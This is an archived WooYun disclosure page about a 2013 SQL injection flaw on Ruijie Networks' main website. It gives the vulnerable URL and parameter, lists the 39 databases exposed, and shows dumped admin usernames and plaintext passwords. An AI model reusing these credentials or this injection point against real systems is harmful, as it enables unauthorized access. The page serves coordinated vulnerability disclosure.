当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-035703

漏洞标题:锐捷网络官网主站sql注入漏洞

相关厂商:ruijie.com.cn

漏洞作者: print_0x0000

提交时间:2013-08-30 17:52

修复时间:2013-10-14 17:53

公开时间:2013-10-14 17:53

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-30: 细节已通知厂商并且等待厂商处理中
2013-09-02: 厂商已经确认,细节仅向厂商公开
2013-09-12: 细节向核心白帽子及相关领域专家公开
2013-09-22: 细节向普通白帽子公开
2013-10-02: 细节向实习白帽子公开
2013-10-14: 细节向公众公开

简要描述:

锐捷网络官网某处存在sql注入漏洞。
危害比较大,厂商自己看吧。

详细说明:

http://www.ruijie.com.cn/锐捷网络官网某处存在sql注入漏洞,危害比较大。
注入点:

http://www.ruijie.com.cn/cysjds/DemandGameModel.aspx?dguid=d7b3fc96-c014-4257-8231-dd9da58da1ad

主站注射,可被脱裤。

1.jpg

2.jpg

Database: ZXXDS
Table: AdminUserInfo
[2 entries]
+-------+-------------+---------+-------------+
| AU_ID | AU_Pwd | AU_Type | AU_Name |
+-------+-------------+---------+-------------+
| 1 | ruijiedasai | 1 | ruijieadmin |
| 2 | adminzwh00 | 1 | admin |
+-------+-------------+---------+-------------+

只是普通的测试,就这样了吧。

漏洞证明:

数据库~

available databases [39]:
[*] CKDS
[*] DemandGame
[*] ELabClub
[*] ELabClub_BBS
[*] Examine
[*] fdr
[*] FileStorage
[*] Invitejob
[*] lumigent
[*] master
[*] model
[*] msdb
[*] NewPresent
[*] Question
[*] ReportServer
[*] ReportServerTempDB
[*] resume
[*] RJSite_CN
[*] RJSite_CN_2013
[*] RJSite_CN_User
[*] RJSITE_CPKCD
[*] RJSite_EN
[*] RJSite_XYZP
[*] RJSite_YJWS
[*] RJWebDB
[*] RuijieIOUManagement
[*] RuijieKX
[*] supportbbs
[*] SWorkflow
[*] tempdb
[*] WEBCNTD
[*] webcollege
[*] WebCollege2012
[*] WebCollege_Test
[*] WebStat
[*] yjsbbs
[*] zfhybkx
[*] zhangweizhong
[*] ZXXDS

修复方案:

修补~

版权声明:转载请注明来源 print_0x0000@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-09-02 10:18

厂商回复:

已处理,感谢!

最新状态:

暂无


漏洞评价:

评论